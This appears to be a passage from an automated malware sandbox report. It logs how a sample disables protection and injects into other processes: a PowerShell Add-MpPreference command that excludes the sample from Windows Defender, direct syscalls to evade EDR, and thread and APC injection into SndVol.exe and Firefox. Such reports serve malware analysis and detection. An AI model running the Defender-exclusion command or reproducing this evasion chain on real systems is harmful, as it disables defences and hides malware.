                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011E0AD0 mov eax, dword ptr fs:[00000030h]5_2_011E0AD0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0121AAEE mov eax, dword ptr fs:[00000030h]5_2_0121AAEE
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0121AAEE mov eax, dword ptr fs:[00000030h]5_2_0121AAEE
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01236ACC mov eax, dword ptr fs:[00000030h]5_2_01236ACC
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01236ACC mov eax, dword ptr fs:[00000030h]5_2_01236ACC
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01236ACC mov eax, dword ptr fs:[00000030h]5_2_01236ACC
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01214AD0 mov eax, dword ptr fs:[00000030h]5_2_01214AD0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01214AD0 mov eax, dword ptr fs:[00000030h]5_2_01214AD0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01268D20 mov eax, dword ptr fs:[00000030h]5_2_01268D20
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011D6D10 mov eax, dword ptr fs:[00000030h]5_2_011D6D10
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011D6D10 mov eax, dword ptr fs:[00000030h]5_2_011D6D10
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011D6D10 mov eax, dword ptr fs:[00000030h]5_2_011D6D10
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011FAD00 mov eax, dword ptr fs:[00000030h]5_2_011FAD00
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011FAD00 mov eax, dword ptr fs:[00000030h]5_2_011FAD00
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011FAD00 mov eax, dword ptr fs:[00000030h]5_2_011FAD00
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01298D10 mov eax, dword ptr fs:[00000030h]5_2_01298D10
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01298D10 mov eax, dword ptr fs:[00000030h]5_2_01298D10
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01214D1D mov eax, dword ptr fs:[00000030h]5_2_01214D1D
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011E0D59 mov eax, dword ptr fs:[00000030h]5_2_011E0D59
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011E0D59 mov eax, dword ptr fs:[00000030h]5_2_011E0D59
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011E0D59 mov eax, dword ptr fs:[00000030h]5_2_011E0D59
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011E8D59 mov eax, dword ptr fs:[00000030h]5_2_011E8D59
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011E8D59 mov eax, dword ptr fs:[00000030h]5_2_011E8D59
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011E8D59 mov eax, dword ptr fs:[00000030h]5_2_011E8D59
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011E8D59 mov eax, dword ptr fs:[00000030h]5_2_011E8D59
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011E8D59 mov eax, dword ptr fs:[00000030h]5_2_011E8D59
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01278D6B mov eax, dword ptr fs:[00000030h]5_2_01278D6B
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01216DA0 mov eax, dword ptr fs:[00000030h]5_2_01216DA0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012A8DAE mov eax, dword ptr fs:[00000030h]5_2_012A8DAE
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012A8DAE mov eax, dword ptr fs:[00000030h]5_2_012A8DAE
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012B4DAD mov eax, dword ptr fs:[00000030h]5_2_012B4DAD
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0121CDB1 mov ecx, dword ptr fs:[00000030h]5_2_0121CDB1
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0121CDB1 mov eax, dword ptr fs:[00000030h]5_2_0121CDB1
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0121CDB1 mov eax, dword ptr fs:[00000030h]5_2_0121CDB1
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01208DBF mov eax, dword ptr fs:[00000030h]5_2_01208DBF
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01208DBF mov eax, dword ptr fs:[00000030h]5_2_01208DBF
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01200DE1 mov eax, dword ptr fs:[00000030h]5_2_01200DE1
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0120CDF0 mov eax, dword ptr fs:[00000030h]5_2_0120CDF0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0120CDF0 mov ecx, dword ptr fs:[00000030h]5_2_0120CDF0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01280DF0 mov eax, dword ptr fs:[00000030h]5_2_01280DF0
                Source: C:\Users\user\Desktop\ungziped_file.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Adds a directory exclusion to Windows Defender
                Source: C:\Users\user\Desktop\ungziped_file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ungziped_file.exe"
                Source: C:\Users\user\Desktop\ungziped_file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ungziped_file.exe"Jump to behavior
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exeNtDeviceIoControlFile: Direct from: 0x77012AECJump to behavior
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exeNtAllocateVirtualMemory: Direct from: 0x77012BECJump to behavior
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exeNtAllocateVirtualMemory: Direct from: 0x770148ECJump to behavior
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exeNtSetInformationThread: Direct from: 0x77012B4CJump to behavior
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exeNtQueryAttributesFile: Direct from: 0x77012E6CJump to behavior
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exeNtQueryVolumeInformationFile: Direct from: 0x77012F2CJump to behavior
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exeNtOpenSection: Direct from: 0x77012E0CJump to behavior
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exeNtQuerySystemInformation: Direct from: 0x770148CCJump to behavior
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exeNtOpenKeyEx: Direct from: 0x77012B9CJump to behavior
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exeNtProtectVirtualMemory: Direct from: 0x77012F9CJump to behavior
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exeNtCreateFile: Direct from: 0x77012FECJump to behavior
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exeNtOpenFile: Direct from: 0x77012DCCJump to behavior
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exeNtQueryInformationToken: Direct from: 0x77012CACJump to behavior
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exeNtTerminateThread: Direct from: 0x77012FCCJump to behavior
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exeNtProtectVirtualMemory: Direct from: 0x77007B2EJump to behavior
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exeNtAllocateVirtualMemory: Direct from: 0x77012BFCJump to behavior
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exeNtReadFile: Direct from: 0x77012ADCJump to behavior
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exeNtNotifyChangeKey: Direct from: 0x77013C2CJump to behavior
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exeNtCreateMutant: Direct from: 0x770135CCJump to behavior
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exeNtSetInformationProcess: Direct from: 0x77012C5CJump to behavior
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exeNtResumeThread: Direct from: 0x770136ACJump to behavior
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exeNtSetInformationThread: Direct from: 0x770063F9Jump to behavior
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exeNtWriteVirtualMemory: Direct from: 0x77012E3CJump to behavior
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exeNtMapViewOfSection: Direct from: 0x77012D1CJump to behavior
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exeNtAllocateVirtualMemory: Direct from: 0x77013C9CJump to behavior
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exeNtWriteVirtualMemory: Direct from: 0x7701490CJump to behavior
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exeNtClose: Direct from: 0x77012B6C
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exeNtReadVirtualMemory: Direct from: 0x77012E8CJump to behavior
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exeNtCreateKey: Direct from: 0x77012C6CJump to behavior
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exeNtDelayExecution: Direct from: 0x77012DDCJump to behavior
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exeNtQuerySystemInformation: Direct from: 0x77012DFCJump to behavior
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exeNtQueryInformationProcess: Direct from: 0x77012C26Jump to behavior
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exeNtResumeThread: Direct from: 0x77012FBCJump to behavior
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exeNtCreateUserProcess: Direct from: 0x7701371CJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: NULL target: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: NULL target: C:\Windows\SysWOW64\SndVol.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: NULL target: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: NULL target: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\SndVol.exeThread register set: target process: 7148Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\SndVol.exeThread APC queued: target process: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exeJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ungziped_file.exe"Jump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeProcess created: C:\Users\user\Desktop\ungziped_file.exe "C:\Users\user\Desktop\ungziped_file.exe"Jump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeProcess created: C:\Users\user\Desktop\ungziped_file.exe "C:\Users\user\Desktop\ungziped_file.exe"Jump to behavior
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exeProcess created: C:\Windows\SysWOW64\SndVol.exe "C:\Windows\SysWOW64\SndVol.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: K1A8707LwM6.exe, 0000000F.00000002.3511569294.0000000000EA0000.00000002.00000001.00040000.00000000.sdmp, K1A8707LwM6.exe, 0000000F.00000000.1319350348.0000000000EA0000.00000002.00000001.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512010149.0000000001500000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: K1A8707LwM6.exe, 0000000F.00000002.3511569294.0000000000EA0000.00000002.00000001.00040000.00000000.sdmp, K1A8707LwM6.exe, 0000000F.00000000.1319350348.0000000000EA0000.00000002.00000001.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512010149.0000000001500000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: K1A8707LwM6.exe, 0000000F.00000002.3511569294.0000000000EA0000.00000002.00000001.00040000.00000000.sdmp, K1A8707LwM6.exe, 0000000F.00000000.1319350348.0000000000EA0000.00000002.00000001.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512010149.0000000001500000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
                Source: K1A8707LwM6.exe, 0000000F.00000002.3510669412.00000000007CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Software\Microsoft\Multimedia\Audio\SndVolSndVolPreferencesMaskSndVolSelectedDevicesShell_TrayWnd
                Source: K1A8707LwM6.exe, 0000000F.00000002.3511569294.0000000000EA0000.00000002.00000001.00040000.00000000.sdmp, K1A8707LwM6.exe, 0000000F.00000000.1319350348.0000000000EA0000.00000002.00000001.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512010149.0000000001500000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\ungziped_file.exeQueries volume information: C:\Users\user\Desktop\ungziped_file.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
